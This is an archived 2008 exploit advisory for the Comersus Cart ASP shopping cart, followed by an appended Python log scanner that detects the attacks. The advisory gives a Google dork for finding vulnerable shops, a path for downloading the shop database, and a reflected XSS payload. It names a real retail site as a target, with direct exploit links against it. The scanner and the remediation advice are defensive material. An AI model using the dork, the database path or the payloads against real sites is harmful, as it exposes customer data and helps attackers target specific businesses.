comersus-disclosexss.txt

29 Nov 2008 00:00:00 | Reported by: Bl@ckbe@rd | Type: packetstorm | Source: packetstormsecurity.com

Exploit type: Comersus Cart, multiple exploits (XSS + remote database disclosure), script's homepage: comersus.com, contact: [email protected], remote database disclosure: http://[website]/[script]/database/commersus.mdb, remote XSS exploit: http://[website]/[script]/comersus_message.asp?message=<script>alert('Bl@ckbe@rD is not dead yet')</script


Code
`[+] Script : Comersus Cart  
  
[+] Exploit Type : Multiple Exploits (XSS + remote database disclosure)  
  
[+] Script's Homepage : http://comersus.com  
  
[+] Google Dork : inurl:.asp? Powered by Comersus ASP Shopping Cart  
  
[+] Contact : [email protected]  
  
  
--//--> Exploit :   
  
1) Remote Database Disclosure :  
  
http://[website]/[script]/database/commersus.mdb  
  
  
2) Remote XSS exploit :   
  
In simple words :  
  
http://[website]/[script]/comersus_message.asp?message=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]  
  
  
[Peace xD ]  
  
  
//Example for str0ke :   
  
https://www.tarkentonsports.com/Comersus/database/comersus.mdb  
  
https://www.tarkentonsports.com/Comersus/store/comersus_message.asp?message=%3Cscript%3Ealert(%27Bl@ckbe@rD%20is%20not%20dead%20yet%27)%3C/script%3E[Peace%20xD%20]  
  
  
`
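
For defenders running Comersus on IIS, both request patterns in the advisory above can be hunted for in the access logs. The script below is an added example, not part of the original advisory: the W3C field layout and log lines are constructed, and `scan` and `fully_decode` are hypothetical names.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed IIS W3C log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-12-01 10:00:01 GET /store/comersus_message.asp message=Thank+you+for+your+order 198.51.100.7 200
2008-12-01 10:00:05 GET /store/comersus_message.asp message=%3Cscript%3Ealert(1)%3C/script%3E 203.0.113.9 200
2008-12-01 10:00:09 GET /database/comersus.mdb - 203.0.113.9 200
2008-12-01 10:00:12 GET /database/comersus.mdb - 203.0.113.9 404
2008-12-01 10:00:15 GET /store/comersus_message.asp message=%253Cscript%253Ealert(1)%253C%252Fscript%253E 203.0.113.9 200
"""

# An opening or closing HTML tag in a parameter that should be plain text.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_text):
    """Return (line_no, client_ip, finding) for each suspicious request."""
    fields, findings = [], []
    for no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        path = fully_decode(rec.get("cs-uri-stem", "")).lower()
        ip, status = rec.get("c-ip", "-"), rec.get("sc-status", "")
        if path.endswith(".mdb"):
            # 200/206 means the database was actually served; anything else is a probe.
            findings.append((no, ip, "mdb-served" if status in ("200", "206") else "mdb-probe"))
        if path.endswith("/comersus_message.asp"):
            for name, val in parse_qsl(rec.get("cs-uri-query", ""), keep_blank_values=True):
                if name.lower() == "message" and MARKUP.search(fully_decode(val)):
                    findings.append((no, ip, "xss-in-message"))
    return findings

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

An `mdb-served` hit means the database file left the server, so anything stored in it should be treated as exposed. The durable fixes are to keep the `.mdb` outside the web root (or deny the extension in IIS) and to HTML-encode `message` before it is written to the page.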

Vulners AI Score: 7.4 (High risk)